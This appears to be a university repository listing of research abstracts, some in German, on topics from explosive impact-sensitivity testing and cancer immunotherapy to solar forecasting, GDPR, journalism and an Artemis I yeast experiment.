A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity, typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition, such as detonation or deflagration. In this study, a drop hammer was constructed to monitor the reaction progress of the decomposition of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of the equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance-specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented, and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiating between reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
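The multivariate workflow described in this abstract (extract features, reduce their dimensionality with PCA, then classify) can be illustrated with a minimal sketch. The data below are synthetic stand-ins for two invented substance classes, and a simple nearest-centroid rule replaces the study's LDA/regressor; this is not the authors' code or data:

```python
# Illustrative sketch: PCA via SVD on synthetic "sensor features",
# followed by nearest-centroid classification in the reduced space.
import numpy as np

rng = np.random.default_rng(0)

# Two hypothetical substances, each with its own feature mean and
# substantial scatter, mimicking the reported substance-specific trends.
X = np.vstack([
    rng.normal(0.0, 1.0, size=(30, 8)),
    rng.normal(2.0, 1.0, size=(30, 8)),
])
y = np.array([0] * 30 + [1] * 30)

# PCA: center the data, keep the top-2 right singular vectors.
Xc = X - X.mean(axis=0)
_, _, Vt = np.linalg.svd(Xc, full_matrices=False)
scores = Xc @ Vt[:2].T   # projection onto the first two components
loadings = Vt[:2]        # which features drive each component

# Nearest-centroid classification in the 2-D score space.
centroids = np.array([scores[y == c].mean(axis=0) for c in (0, 1)])
pred = np.argmin(
    np.linalg.norm(scores[:, None, :] - centroids[None, :, :], axis=2),
    axis=1,
)
accuracy = (pred == y).mean()
print(round(accuracy, 2))
```

The loadings matrix plays the role the abstract describes: its largest entries indicate which extracted features are most significant for separating the clusters.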
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment. We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated, and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
Cytokine-induced killer (CIK) cells in combination with dendritic cells (DCs) have shown favorable outcomes in renal cell carcinoma (RCC), yet some patients exhibit recurrence or no response to this therapy. In a broader perspective, enhancing the antitumor response of DC-CIK cells may help to address this issue. Considering this, we investigated the effect of anti-CD40 and anti-CTLA-4 antibodies on the antitumor response of DC-CIK cells against RCC cell lines. Our analysis showed that: a) the anti-CD40 antibody (G28.5) increased the CD3+CD56+ effector cells of CIK cells by promoting the maturation and activation of DCs; b) G28.5 also increased CTLA-4 expression in CIK cells via DCs, but this increase could be hindered by the CTLA-4 inhibitor ipilimumab; c) adding ipilimumab was also able to significantly increase the proportion of CD3+CD56+ cells in DC-CIK cells; d) anti-CD40 antibodies predominated over anti-CTLA-4 antibodies for the cytotoxicity, apoptotic effect, and IFN-γ secretion of DC-CIK cells against RCC cells; e) after ipilimumab treatment, the population of Tregs in CIK cells remained unaffected, but ipilimumab combined with G28.5 significantly reduced the expression of CD28 in CIK cells. Taken together, we suggest that the agonistic anti-CD40 antibody rather than the CTLA-4 inhibitor may improve the antitumor response of DC-CIK cells, particularly in RCC. In addition, we point towards the as-yet-unknown contribution of CD28 to the crosstalk between anti-CTLA-4 antibodies and CIK cells.
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. Particularly, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and step by step extend that to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
Jahresbericht 2021
(2022)
While many proteins are known clients of heat shock protein 90 (Hsp90), it is unclear whether the transcription factor, thyroid hormone receptor beta (TRβ), interacts with Hsp90 to control hormonal perception and signaling. Higher Hsp90 expression in mouse fibroblasts was elicited by the addition of triiodothyronine (T3). T3 bound to Hsp90 and enhanced adenosine triphosphate (ATP) binding of Hsp90 due to a specific binding site for T3, as identified by molecular docking experiments. The binding of TRβ to Hsp90 was prevented by T3 or by the thyroid mimetic sobetirome. Purified recombinant TRβ trapped Hsp90 from cell lysate or purified Hsp90 in pull-down experiments. The affinity of Hsp90 for TRβ was 124 nM. Furthermore, T3 induced the release of bound TRβ from Hsp90, which was shown by streptavidin-conjugated quantum dot (SAv-QD) masking assay. The data indicate that the T3 interaction with TRβ and Hsp90 may be an amplifier of the cellular stress response by blocking Hsp90 activity.
While the recent discussion on Art. 25 GDPR often considers the approach of data protection by design as an innovative idea, the notion of making data protection law more effective through requiring the data controller to implement the legal norms into the processing design is almost as old as the data protection debate. However, there is another, more recent shift in establishing the data protection by design approach through law, which is not yet understood to its fullest extent in the debate. Art. 25 GDPR requires the controller to not only implement the legal norms into the processing design but to do so in an effective manner. By explicitly declaring the effectiveness of the protection measures to be the legally required result, the legislator inevitably raises the question of which methods can be used to test and assure such efficacy. In our opinion, extending the legal compatibility assessment to the real effects of the required measures opens this approach to interdisciplinary methodologies. In this paper, we first summarise the current state of research on the methodology established in Art. 25 sect. 1 GDPR, and pinpoint some of the challenges of incorporating interdisciplinary research methodologies. On this premise, we present an empirical research methodology and first findings which offer one approach to answering the question on how to specify processing purposes effectively. Lastly, we discuss the implications of these findings for the legal interpretation of Art. 25 GDPR and related provisions, especially with respect to a more effective implementation of transparency and consent, and provide an outlook on possible next research steps.
Despite the coronavirus pandemic, Hochschule Bonn-Rhein-Sieg (H-BRS) managed to break new ground and set new accents in research, teaching, and transfer over the past year. Talents, ideas, and collaborations came into their own in a variety of ways, always in close exchange between applied science, society, and business. "Entfalten" (unfold) is therefore the motto of the H-BRS annual report for 2021, which has now been published.
Discarded news
(2022)
When important news fails to reach its recipients, namely the politically interested, socially open-minded public, we sometimes refer to this process as agenda cutting. This article presents the key theoretical positions on this under-researched phenomenon, presenting important study results as well as our own empirical findings on internal editorial decision-making processes whereby topics are removed from the agenda. Finally, we critically examine the role of the audience as an actor in agenda cutting, which could be described as »news ignorance«.[1]
The top story showcased by Initiative Nachrichtenaufklärung (INA) e.V. in 2022 was the creeping abolition of free textbooks in German schools. In a public radio broadcast, the head of TV news magazine Tagesthemen and deputy editor-in-chief of ARD-Aktuell, Helge Fuhst, conceded that he considered this topic highly relevant, yet it had indeed not been covered in his TV news program. »Leaving out topics is, in fact, the most difficult challenge,« Fuhst said. »Having to drop topics hurts every day. There are only a few days a year when we have absolutely no idea what to put on the air.« (WDR 2022)
The process of news selection is editorial routine, which includes omitting, discarding, or abandoning topics. When this negative process is intentional, it can also be referred to as agenda cutting. This term from the field of communications science describes a distinct form of editorial routine that has been little studied to date and whose mechanisms, with their considerable influence on the formation of public opinion, are in urgent need of media research scrutiny.
Ausrangierte Nachrichten
(2022)
Important news does not reach its intended destination, namely the politically interested and socially open-minded public. This process can be described as agenda cutting. The article presents the most important theoretical positions on this still little-researched phenomenon, along with key study results and our own empirical findings on intra-editorial decision-making processes in which topics are removed from the agenda. Finally, the role of the audience as an actor in the process of agenda cutting, which could be described as »news ignorance«, is examined critically.[1]
The creeping abolition of free learning materials in the German federal states ranks first in the 2022 top ten of the 'forgotten news' that the Initiative Nachrichtenaufklärung (INA) e.V. brings to public attention every year. Helge Fuhst, head of the TV news magazine Tagesthemen and deputy editor-in-chief of ARD-Aktuell, conceded on a media program of a public radio station that he considered this topic highly relevant and that it had indeed not been covered in his TV news program. »The most difficult thing is actually leaving out topics,« said Fuhst. »It hurts us every day when we have to leave out topics. There are few days in the course of the year when we have absolutely no idea what to put in the program« (WDR 2022).
The process of news selection is editorial routine, and this routine also includes leaving out, sorting out, and discarding topics. When this negative process occurs intentionally, it can also be called agenda cutting. This term from communication science describes a distinct form of editorial routine that has so far received little study and whose mechanisms, with their considerable influence on the formation of public opinion, urgently belong under the scalpel of media research.
Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings in the current context of climate change is a well-known strategy to improve the energy efficiency of buildings. The development of renewable insulation material can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to perform benchmarking of environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component sodium silicate. Sodium silicate's CO2 emissions depend on local production, transportation, and energy consumption. The results, which have been published during recent years, vary in a wide range from 0.3 kg to 3.3 kg CO2-eq. kg⁻¹. The overall GWP of the insulation system based on Miscanthus fibers, with properties according to current thermal insulation regulations, reaches up to 95% savings of CO2 emissions compared to conventional systems. Carbon neutrality can be achieved through formulations containing raw materials with carbon dioxide emissions and renewable materials with negative GWP, thus balancing CO2 emissions.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Due to the COVID-19 pandemic, health education programs and workplace health promotion (WHP) could only be offered under difficult conditions, if at all. In Germany for example, mandatory lockdowns, working from home, and physical distancing have led to a sharp decline in expenditure on prevention and health promotion from 2019 to 2020. At the same time, the pandemic has negatively affected many people’s mental health. Therefore, our goal was to examine audiovisual stimulation as a possible measure in the context of WHP, because its usage is contact-free, time flexible, and offers, additionally, voice-guided health education programs. In an online survey following a cross-sectional single case study design with 393 study participants, we examined the associations between audiovisual stimulation and mental health, work engagement, and burnout. Using multiple regression analyses, we could identify positive associations between audiovisual stimulation and mental health, burnout, and work engagement. However, longitudinal data are needed to further investigate causal mechanisms between mental health and the use of audiovisual stimulation. Nevertheless, especially with regard to the pandemic, audiovisual stimulation may represent a promising measure for improving mental health at the workplace.
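The kind of multiple regression analysis mentioned above can be sketched with ordinary least squares. All variables and coefficients below are invented for illustration; they are not the survey's actual items or results:

```python
# Sketch of a multiple (OLS) regression relating predictors to an
# outcome. Predictors and effect sizes are synthetic illustrations.
import numpy as np

rng = np.random.default_rng(1)
n = 393  # matches the number of study participants reported above

# Hypothetical predictors: frequency and session length of
# audiovisual-stimulation use.
usage = rng.uniform(0, 10, n)
length = rng.uniform(5, 40, n)

# Simulated outcome with known positive associations plus noise.
wellbeing = 0.5 * usage + 0.1 * length + rng.normal(0, 1, n)

# Design matrix with an intercept column; solve via least squares.
X = np.column_stack([np.ones(n), usage, length])
beta, *_ = np.linalg.lstsq(X, wellbeing, rcond=None)
print(beta.round(2))  # [intercept, usage coeff., length coeff.]
```

With real survey data, the estimated coefficients (and their significance tests, omitted here) would quantify the associations the study reports; this sketch only recovers the coefficients it planted.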
The medicalization thesis and the compression thesis are two "competing" approaches to the question of the state of health in which a longer life, in particular the years of life at an older age, is spent. Beyond the individual significance of the quantity and quality of life years, this question is highly relevant for the healthcare system: not only has the number and share of older people risen in the past, but a further increase, including in life expectancy, is projected in the context of demographic change, and the effects on care needs and healthcare expenditure can be considerable.
This thesis deals with the development of a circuit concept and a laboratory prototype of an external illumination unit for use in research on time-of-flight (ToF) cameras that employ the amplitude-modulated continuous wave (AMCW) method. The external illumination acts as a high-power repeater of a ToF camera's internal illumination and is capable of emitting the high-frequency rectangular signals used by ToF cameras.
Since ToF cameras do not usually provide an electrical control signal (trigger signal) for operating an external illumination, the trigger is derived from the camera's optical signal. For this purpose, a concept for an optical detector (trigger) is presented, consisting of a photodiode, a transimpedance amplifier, and subsequent signal conditioning. It is also shown how a fast external illumination with high radiant power can be implemented using a metal-oxide-semiconductor field-effect transistor (MOSFET) and four vertical-cavity surface-emitting lasers (VCSELs). Two circuit concepts are presented for this, a series and a parallel connection of the MOSFET and the VCSELs. VCSELs with a wavelength of 940 nm in the near infrared (NIR), typical for ToF cameras, are used as light sources.
It was shown that the optical trigger can convert optical signals of up to 100 MHz into electrical output signals. Rectangular trigger signals with rise times of 650 ps and fall times of 440 ps were achieved. The external illumination was able to emit signals of up to 100 MHz. In combination with the optical trigger, optical signals with rise times of 1.5 ns and fall times of 960 ps were achieved, with radiant powers of almost 7 W. The complete system of optical trigger and external illumination exhibits a latency of 16 ns. As a result of this work, a system was built that, based on the results achieved, can most likely be used as an external illumination for research purposes with various ToF cameras. The optical trigger and the illumination can also be used separately.
This paper explores the role of artificial intelligence (AI) in elite sports. We approach the topic from two perspectives. First, we provide a literature-based overview of AI success stories in areas other than sports. We identified multiple approaches in the areas of Machine Perception, Machine Learning and Modeling, Planning and Optimization, as well as Interaction and Intervention, each holding potential for improving training and competition. Second, we assess the present status of AI use in elite sports. To this end, in addition to another literature review, we interviewed leading sports scientists who are closely connected to the main national service institutes for elite sports in their countries. The analysis of this literature review and the interviews shows that most activity is carried out in the methodical categories of signal and image processing. However, projects in the field of modeling and planning have become increasingly popular within the last years. Based on these two perspectives, we extract deficits, issues, and opportunities and summarize them in six key challenges faced by the sports analytics community. These challenges include data collection, controllability of an AI by the practitioners, and explainability of AI results.
Since Socrates, the question "What constitutes a happy life?" has been the starting point for the development of a variety of theories of well-being. The core of this essay is a discussion of the extent to which the concept of empirical life satisfaction, and the correlates obtained through it, contribute to answering this question, and whether these answers can ground a theory of well-being that links philosophical theory with empirical results.
At the center of this essay is a discussion of the most important theories of well-being, their qualities, commonalities, and differences. One focus is the theory of subjective life satisfaction. I discuss the strengths and weaknesses of the concept and present an overview of the most important results of empirical life satisfaction research.
In conclusion, I argue that the results of empirical research can serve as the basis of a subjective-objective theory of well-being. High-quality interpersonal relationships, a healthy lifestyle, a balanced work-life relationship, commitment to others, and the pursuit of life goals and personal interests form the foundation of a theory of well-being grounded in empirical life satisfaction research.
In the course of the migration movement of 2015 and 2016, the humane accommodation of refugees in German municipalities gained attention. The rise in the number of asylum seekers in the municipalities, as well as the federal initiative "Schutz von geflüchteten Menschen in Flüchtlingsunterkünften" (protection of refugees in refugee shelters), brought about changes with regard to protection standards in municipal refugee accommodation. The article explains these changes by means of an actor-centered, organizational-sociological approach. It is based on empirical research findings from two German municipalities, gathered in the project "Organisational Perspectives on Human Security Standards for Refugees in Germany".
The non-scientific questioning of scientific research during the COVID-19 pandemic, the unwillingness of a president of the United States of America to accept the result of a democratically held election: just in recent times, there have been quite a few striking examples of long-held certainties appearing as nothing more than just illusions. This essay reflects on the severe consequences of the loss of such certainties in the spheres of democratic politics on the one hand and of science, especially for highly differentiated societies, on the other hand as well as on their interdependencies. Furthermore, the author tries to make the case that this disillusionment could prove to be a salutary shock – reminding us that we need to take a stand for the things we hold as certainties, oftentimes even as calming ones, if we want them to stay how we always thought they were.
The body of prior research dedicated to digital entrepreneurship education is immense, which makes it difficult to gain an overview. Bibliometric visualization, mapping, and clustering can help to visualize and structure this extensive research literature. Hence, the goal of this mapping and visualization study is to thoroughly identify clusters of entrepreneurship education (EE) research and convey a taxonomic structure that can serve as a basis for future research. The analyzed data, drawn from Google Scholar through the Publish or Perish tool, contain 1000 documents published between 2007 and 2022. On the one hand, this taxonomy should generate stronger bonds within digital entrepreneurial education research; on the other, it should connect international research to boost both interdisciplinary digital entrepreneurial education and its influence on a universal basis. This work strengthens students' understanding of current digital entrepreneurial education research by classifying and distilling the most influential scholarly relationships among its contributions and contributors. The bibliographic analysis covers the citation network, the authors' research areas, and paper content on the topic of interest. These three aspects are integrated into a bibliographic model of authors, paper titles, keywords, and abstracts: Harzing's Publish or Perish tool is used to extract data from Google Scholar, and VOSviewer is used to visualize network maps of co-authorship and term co-occurrence, supporting an intuitive and appropriate understanding of university students' 'digital entrepreneurial intention' research.
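Term co-occurrence, the basis of the VOSviewer maps described above, reduces to counting how often keyword pairs appear in the same document. A minimal sketch with invented documents and keywords (not the study's data):

```python
# Count keyword co-occurrences across documents; frequent pairs form
# the densest links in a bibliometric term map. Documents below are
# hypothetical examples, not the analyzed corpus.
from collections import Counter
from itertools import combinations

docs = [
    {"entrepreneurship", "education", "digital"},
    {"entrepreneurship", "digital", "intention"},
    {"education", "intention"},
]

cooc = Counter()
for keywords in docs:
    # Sorting makes each unordered pair a canonical (a, b) key.
    for a, b in combinations(sorted(keywords), 2):
        cooc[(a, b)] += 1

print(cooc.most_common(2))
```

Tools like VOSviewer build such a co-occurrence matrix at scale and then lay out and cluster the terms; the counting step itself is exactly this simple.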
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals, and the environment, which, given its interdisciplinarity and intersectoral focus on the co-production of knowledge, can be implemented as a Research-Practice-Collaboration (RPC). To exemplify this, the present commentary presents the Forschungskolleg "One Health and Urban Transformation", funded by the Ministry of Culture and Science of the State of North Rhine-Westphalia in Germany. The analysis identified as factors for a better implementation of RPCs for One Health those that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, training a new generation of scientists at the boundaries of different disciplines, equipped with mediation skills between academia and practice, is an important contribution with great implications for societal change that can aid the further development of RPCs.
The cooperation between researchers and practitioners during the different stages of the research process is promoted as it can be of benefit to both society and research supporting processes of ‘transformation’. While acknowledging the important potential of research–practice–collaborations (RPCs), this paper reflects on RPCs from a political-economic perspective to also address potential unintended adverse effects on knowledge generation due to divergent interests, incomplete information or the unequal distribution of resources. Asymmetries between actors may induce distorted and biased knowledge and even help produce or exacerbate existing inequalities. Potential merits and limitations of RPCs, therefore, need to be gauged. Taking RPCs seriously requires paying attention to these possible tensions—both in general and with respect to international development research, in particular: On the one hand, there are attempts to contribute to societal change and ethical concerns of equity at the heart of international development research, and on the other hand, there is the relative risk of encountering asymmetries more likely.
For decades, the liquid that symbolizes menstrual blood in commercials was blue; only in September 2021 did a manufacturer for the first time show a liquid realistically depicted in red (1). Hygiene products that menstruating people urgently need are, with few exceptions, not available in public toilets in Germany: this invisibility revealed, in 2021 as well, the taboo surrounding natural biological processes of the female body. The consequences are shame and restrictions that could be avoided. Menstruating people are limited in their well-being, and negative experiences mean that those affected are impaired in carrying out social, school, and professional activities not only by menstruation itself but also by norms and patterns of upbringing, as numerous international studies have shown (2). Such studies are so far lacking for the German higher-education context.
The electricity grid of the future will be built on renewable energy sources, which are highly variable and dependent on atmospheric conditions. In power grids with an increasingly high penetration of solar photovoltaics (PV), an accurate knowledge of the incoming solar irradiance is indispensable for grid operation and planning, and reliable irradiance forecasts are thus invaluable for energy system operators. In order to better characterise shortwave solar radiation in time and space, data from PV systems themselves can be used, since the measured power provides information about both irradiance and the optical properties of the atmosphere, in particular the cloud optical depth (COD). Indeed, in the European context with highly variable cloud cover, the cloud fraction and COD are important parameters in determining the irradiance, whereas aerosol effects are only of secondary importance.
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), energy-meteorological and load-related measurement data, among others, are collected; an overview of their availability is to be presented on a poster.
Context: In Ghana, the total electricity consumed almost doubled between 2008 and 2018, according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. The blackouts, called "dumsor" in Ghana, pose a severe burden on the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
West Africa has great potential for the use of solar energy systems, as it combines high solar irradiation with a shortage of energy production. It is also a very aerosol-rich region, and the effects of aerosols on photovoltaic (PV) use depend on both atmospheric conditions and the solar technology deployed. This study reports the variability of aerosol optical properties in the city of Koforidua, Ghana, over the period 2016 to 2020, and their impact on the irradiance and efficiency of a PV cell. The study used AERONET ground data (Giles et al., 2019) and satellite data produced by CAMS (Gschwind et al., 2019), which both provide aerosol optical depth (AOD) and meteorological parameters used for radiative transfer calculations with libRadtran (Emde et al., 2016). A spectrally resolved PV model (Herman-Czezuch et al., 2022) is then used to calculate the PV yield of two PV technologies: polycrystalline and amorphous silicon. For both data sets, the aerosol is found to consist mainly of dust and organic matter, with a strongly increased AOD load during the Harmattan period (December-February), partly due to the fires observed during this period.
Digitalization and the use of information and communication technologies (ICT) have led not only to higher productivity in working and private life but also to new forms of psychological stress. The stress experienced in connection with the use of ICT is also referred to in the literature as technostress. Research on this topic shows that the emergence of technostress depends on individual factors. The personality of ICT users not only determines the occurrence of technostress but also influences its health-related and performance-related consequences. This literature review systematically summarizes the state of research on the role of personality differences in the emergence of technostress and its consequences. The relevant research articles are analyzed with regard to the variables used, samples and study designs, statistical methods, theories, and frameworks. Finally, the current state of research is put into context and research gaps are identified.
In viticulture, infestation with harmful fungi leads to yield losses as well as to economic and ecological burdens caused by the preventive use of fungicides. These could be reduced by early detection of infestation. The vinoLAS® project aims to enable contactless early detection of downy mildew, an important harmful fungus in viticulture, using methods of laser-induced fluorescence spectroscopy. In this thesis, a detection module for analyzing the laser-induced fluorescence light in four spectral channels is developed.
The requirements for the detection module are defined and its development is explained. The system can be divided into an optical and an electronic setup. The behavior of the electronic setup is characterized by extensive measurements and compared with the requirements. It is then combined with the optical setup into an overall system, with which measurements are carried out in the vinoLAS® laboratory setup and compared against a reference measurement for verification.
Die Messungen zum elektronischen Aufbau zeigen, dass alle gestellten Anforderungen erfüllt und teilweise übertroffen werden. Das entstandene Gated-Integrator System ist mit einem, deutlich teureren, kommerziellen Gated-Integrator vergleichbar, bietet dabei aber doppelt so viele Kanäle und ein 44% geringeres Rauschen. Mit der Diskussion der Messdaten werden außerdem Ansätze vorgestellt, die eine kostengünstige weiter Verbesserung des elektronischen Systems ermöglichen.
Die Messungen mit dem Gesamtsystem zeigen eine qualitative Übereinstimmung mit der Referenzmessung, es sind jedoch noch quantitative Abweichungen vorhanden, die weiter untersucht werden müssen. Außerdem zeigt sich, dass die Qualität der Messdaten durch eine Schwankung der Laserfrequenz stark eingeschränkt wird. Eine leicht implementierbare und kostengünstige Lösung für dieses Problem wird jedoch vorgestellt.
Nach Umsetzung der beiden Verbesserungsvorschläge kann das System in den vinoLAS® Aufbau integriert werden und so eine kontaktlose Früherkennung von falschem Mehltau in Weinreben ermöglichen.
The aim of this paper is to assess the challenges farmers face in enhancing biodiversity. The so-called "trilemma" (WBGU 2021) of land use stems from the multiple demands made on land for the benefit of mitigating climate change, securing food and maintaining biodiversity. The agricultural sector is accused of maladministration: it is blamed for causing soil contamination, animal cruelty, bee mortality and climate change. That is why farmers are seen as key actors at all levels. They are, however, also key players when it comes to overcoming the problems of the future. Their supportive role is urgently needed, but farmers find themselves caught between a rock and a hard place. Consumers are calling for sustainable, environmentally friendly production and inexpensive food products that do not contain pesticide residues, while demanding enough food for all. Farmers are restricted by the wants and needs of consumers, who are influenced by interest groups, and are exposed to direct and indirect influencing factors and their interdependencies. They are also tasked with balancing the scrutiny of the critical public on the one hand and the control exercised by eager authorities on the other.
As part of the DINA (Diversity of Insects in Nature protected Areas) project, a trans- and interdisciplinary research study, we collected and surveyed data from farmers who are farming within or close to the 21 selected nature protected areas included in the DINA project. Data was collected as part of a mixed-method approach using a semi-structured questionnaire. The methodological and strategic approach and the interdependencies of issues demonstrate the complexity of today's problems. To investigate this, we first collected data using questionnaires with closed and open questions. The conflicts and obstacles farmers face were evaluated, and the results show farmers' willingness and the importance of appreciation shown to farmers for the implementation of biodiversity measures. The paper proposes some follow-up activities (a quantitative study) to verify the objectives. The results will later lead to recommendations for policymakers and farmers in all German nature protected areas.
The accurate forecasting of solar radiation plays an important role in predictive control applications for energy systems with a high share of photovoltaic (PV) energy. Especially off-grid microgrid applications using predictive control can benefit from forecasts with a high temporal resolution to address sudden fluctuations of PV power. However, cloud formation processes and movements are subject to ongoing research. For now-casting applications, all-sky imagers (ASI) are used to offer appropriate forecasting for the aforementioned application. Recent research aims to achieve these forecasts via deep learning approaches, either as an image segmentation task to generate a DNI forecast through a cloud vectoring approach and translate the DNI to a GHI with ground-based measurement (Fabel et al., 2022; Nouri et al., 2021), or as an end-to-end regression task to generate a GHI forecast directly from the images (Paletta et al., 2021; Yang et al., 2021). While end-to-end regression might be the more attractive approach for off-grid scenarios, the literature reports increased performance compared to smart persistence but does not show satisfactory forecasting patterns (Paletta et al., 2021). This work takes a step back and investigates the possibility of translating ASI images to the current GHI in order to deploy the neural network as a feature extractor. An ImageNet pre-trained deep learning model is used to achieve such translation on an openly available dataset by the University of California San Diego (Pedro et al., 2019). The images and measurements were collected in Folsom, California. Results show that the neural network can successfully translate ASI images to GHI for a variety of cloud situations without the need for any external variables. Extending the neural network to a forecasting task also shows promising forecasting patterns, which indicates that the neural network extracts both temporal and momentary features from the images to generate GHI forecasts.
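The smart-persistence baseline referenced above forecasts GHI by holding the current clear-sky index constant over the forecast horizon. A minimal sketch of this commonly used baseline (a generic illustration, not the exact implementation of the cited works):

```python
def smart_persistence(ghi_now, clearsky_now, clearsky_future):
    """Forecast future GHI by persisting the current clear-sky index.

    ghi_now         -- measured GHI at forecast issue time [W/m^2]
    clearsky_now    -- modeled clear-sky GHI at issue time [W/m^2]
    clearsky_future -- modeled clear-sky GHI at the forecast horizon [W/m^2]
    """
    if clearsky_now <= 0:          # night or sun below horizon
        return 0.0
    kt = ghi_now / clearsky_now    # clear-sky index, assumed constant
    return kt * clearsky_future

# Example: 600 W/m^2 measured under an 800 W/m^2 clear sky,
# clear-sky model predicts 750 W/m^2 at the forecast horizon:
print(smart_persistence(600.0, 800.0, 750.0))  # 562.5
```

Because the clear-sky index absorbs the deterministic diurnal cycle, beating this baseline requires a model to anticipate actual cloud dynamics, which is why it is the standard reference in the cited literature.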
Microarray-based experiments revealed that thyroid hormone triiodothyronine (T3) enhanced the binding of Cy5-labeled ATP on heat shock protein 90 (Hsp90). By molecular docking experiments with T3 on Hsp90, we identified a T3 binding site (TBS) near the ATP binding site on Hsp90. A synthetic peptide encoding HHHHHHRIKEIVKKHSQFIGYPITLFVEKE derived from the TBS on Hsp90 showed, in MST experiments, the binding of T3 at an EC50 of 50 μM. The binding motif can influence the activity of Hsp90 by hindering ATP accessibility or the release of ADP.
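An EC50 of 50 μM can be read through a simple one-site binding isotherm, in which half of the peptide is occupied at the EC50 concentration. This is an illustrative textbook model, not the fitting procedure used in the MST experiments:

```python
def fraction_bound(ligand_uM, ec50_uM=50.0):
    """One-site binding isotherm: fraction of peptide bound at a given
    ligand (here T3) concentration; half-occupancy occurs at the EC50.
    The EC50 default of 50 uM is the value reported in the abstract."""
    return ligand_uM / (ligand_uM + ec50_uM)

print(fraction_bound(50.0))   # 0.5  (half-occupancy at the EC50)
print(fraction_bound(150.0))  # 0.75 (three times the EC50)
```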
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate between gravity and radiation exposure on single-gene deletion/overexpressing strains' ability to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. 
The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Modern PCR-based analytical techniques have reached sensitivity levels that allow for obtaining complete forensic DNA profiles from even tiny traces containing genomic DNA amounts as small as 125 pg. Yet these techniques have reached their limits when it comes to the analysis of traces such as fingerprints or single cells. One suggestion to overcome these limits has been the usage of whole genome amplification (WGA) methods. These methods aim at increasing the copy number of genomic DNA and by this means generate more template DNA for subsequent analyses. Their application in forensic contexts has so far remained mostly an academic exercise, and results have not shown significant improvements and even have raised additional analytical problems. Until very recently, based on these disappointments, the forensic application of WGA seems to have largely been abandoned. In the meantime, however, novel improved methods are pointing towards a perspective for WGA in specific forensic applications. This review article tries to summarize current knowledge about WGA in forensics and suggests the forensic analysis of single-donor bioparticles and of single cells as promising applications.
